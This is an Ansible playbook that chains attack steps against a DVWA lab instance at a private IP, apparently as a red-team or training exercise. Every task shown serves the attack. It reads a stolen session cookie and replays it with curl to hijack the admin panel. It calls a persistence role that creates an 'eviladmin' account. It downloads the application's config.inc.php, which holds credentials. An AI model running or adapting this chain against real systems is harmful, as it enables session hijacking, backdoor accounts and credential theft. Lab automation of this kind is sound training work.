---
- name: Chain – Step 1: Run PoC1 Reconnaissance
  include_role:
    name: poc1/reconnaissance

- name: Chain – Step 2: Run PoC1 Initial Access
  include_role:
    name: poc1/initial-access

- name: Chain – Step 3: Steal user session cookie (simulate collector receiving it)
  shell: "cat /tmp/collector_output.txt"
  register: stolen_cookie_result

- name: Show stolen cookie value
  debug:
    var: stolen_cookie_result.stdout

- name: Set fact for stolen cookie
  set_fact:
    stolen_cookie_value: "{{ stolen_cookie_result.stdout }}"

- name: Chain – Step 4: Use stolen cookie for PoC2 Privilege Escalation
  shell: |
    curl -b "security=low; PHPSESSID={{ stolen_cookie_value }}" \
    http://192.168.254.129/DVWA/admin/
  register: hijack_result

- name: Show admin panel hijack result
  debug:
    var: hijack_result.stdout

- name: Chain – Step 5: Run PoC2 Persistence Phase (create eviladmin)
  include_role:
    name: poc2/persistence

- name: Chain – Step 6: Exfiltrate DVWA config file
  shell: |
    curl -b "PHPSESSID={{ stolen_cookie_value }}" \
    http://192.168.254.129/DVWA/config/config.inc.php \
    -o /tmp/dvwa_config.inc.php
